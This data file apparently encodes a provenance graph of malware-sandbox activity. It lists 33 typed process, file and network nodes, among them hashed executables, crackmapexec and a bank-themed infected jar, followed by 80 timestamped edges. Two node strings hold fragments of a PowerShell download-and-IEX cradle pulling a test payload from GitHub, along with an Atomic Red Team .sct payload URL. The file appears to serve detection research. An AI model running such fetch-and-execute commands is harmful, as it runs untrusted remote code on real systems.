33
MP-ngen.exe
MP*-iexplore.exe 
MP-radmin scanner.exe 
TP-AdobeARM.ex
MP-pnputil.exe
SO-https://meta.ua/';$nwc.headers['Sec-Fetch-Dest']='document';$nwc.headers['Sec-Fetch-Mode']='no-cors';$nwc.headers['Sec-Fetch-Site']='cross-site';$nwc.headers['TE']='trailers';$nwc.headers['User-Agent']='Mozilla/5.0
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct
MP*-nsA299.tmp
SO-127.0.0.1
MF-345678.exe
TF-\Users\admin\AppData\Local\Temp\farmhand-2023-08-23.js
MF-C:\Users\admin\AppData\Local\Temp\tmpB7A8.tmp
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TP-netsh.exe
MP*-5b7fff06560c607aa96cb59870b1a39e911f5dc52f2c6e720e6758c7855b89fb.exe 
MP-Ürünla_fiyat 10243975_formu scann..10 adet.exe
MP-Ayuaey.exe 
MP*-o0575127.exe
TP-pktmon.exe
TF-C:\Windows\System32\vds
MP-iexplore.exe
MP-chrome.exe 
MP-setup.exe 
SO-http://www.velux.de/kundendienstbedingungen
TF-C:\Users\admin\Desktop\HxDSetup.exe
MP-Dieselmotorers.exe
TP-253a704acd7952677c70e0c2d787791b8359efe2c92a5e77acea028393a85613.exe 
MP-MicrosoftEdgeUpdate.exe
MF-C:\Users\admin\AppData\Local\Temp\B47C.exe
MF-\Users\admin\AppData\Local\Temp\bltf.exe.INFECTED.dll
MF-\Users\admin\AppData\Roaming\skmt-bankinter-003-03588993232059560257100458.jar
MP-vds.exe
MP-crackmapexec.exe
80
0 1 FR-1
0 2 UK-1
1 3 IJ-1
1 4 FR-1
3 4 UK-1
5 1 RF-1
1 6 ST-1
1 7 FR-1
5 7 RF-2
6 7 RF-1
1 8 ST-1
8 7 RF-1
1 9 WR-1
7 9 WR-2
1 10 WR-1
7 10 WR-2
1 11 WR-1
7 11 WR-2
7 12 ST-2
5 13 RF-2
6 13 RF-1
7 13 UK-2
14 5 ST-3
6 14 RF-1
14 8 ST-3
14 9 WR-3
14 10 RD-3
14 11 EX-3
12 14 RF-2
15 5 ST-3
15 6 ST-3
15 8 ST-3
15 9 WR-3
15 10 WR-3
15 11 WR-3
12 15 RF-2
14 15 UK-3
16 6 ST-3
16 8 ST-3
16 9 WR-3
16 10 WR-3
16 11 WR-3
12 16 RF-2
8 17 RF-3
17 9 WR-4
17 10 RD-4
17 11 WR-4
17 12 ST-4
18 8 ST-4
18 9 UK-4
16 19 RD-3
17 19 RD-4
20 10 WR-4
20 11 UK-4
12 21 RF-2
21 19 RD-4
22 12 ST-4
16 22 UK-3
17 23 ST-4
21 23 ST-4
17 24 WR-4
21 24 UK-4
17 25 FR-4
25 19 RD-4
25 23 ST-4
17 26 FR-4
26 19 WR-4
23 26 RF-4
25 26 IJ-4
17 27 FR-4
27 19 WR-4
27 23 ST-4
25 27 UK-4
26 28 RD-4
26 29 RD-4
26 30 WR-4
31 23 ST-4
26 31 UK-4
32 23 ST-4
32 28 UK-4

